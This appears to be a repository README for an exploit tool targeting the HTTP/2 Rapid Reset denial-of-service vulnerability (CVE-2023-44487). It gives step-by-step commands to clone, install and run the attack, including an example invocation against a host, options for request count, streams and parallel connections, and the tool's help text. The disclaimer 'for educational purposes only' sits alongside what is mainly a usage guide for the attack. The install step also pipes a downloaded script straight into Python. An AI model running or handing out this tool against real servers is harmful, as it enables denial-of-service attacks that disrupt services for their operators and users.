Quick exploit to test out the rapid reset attack (CVE-2023-44487). Note: For educational purposes only.
Clone the repository to your local machine using Git, install Poetry, and run the program:
```bash
git clone https://github.com/studiogangster/CVE-2023-44487.git
cd CVE-2023-44487

# Install Poetry, if you haven't already:
curl -sSL https://install.python-poetry.org | python -

# Install the dependencies with Poetry:
poetry install

# Activate the virtual environment created by Poetry:
poetry shell

# Run Help
python main.py

# Example:
python main.py --host example.com --path /api --headers "Authorization: Basic dummy-token ; Custom-Header:Custom-Header-Value" --port 443 --requests_count 100 --max_streams 20 --parallel_connections 2
```
```
Usage: main.py [OPTIONS]

Options:
  --host TEXT                     Host URL [required]
  --path TEXT                     Path on the host [required]
  --headers TEXT                  Headers (comma-separated) [required]
  --port INTEGER                  Port number [required]
  --requests_count INTEGER        Number of requests to be sent [required]
  --max_streams INTEGER           Maximum streams to be opened in parallel
                                  [required]
  --parallel_connections INTEGER  Number of parallel connections to be made
                                  with the server. (TCP connection)
                                  [required]
  --help                          Show this message and exit.
```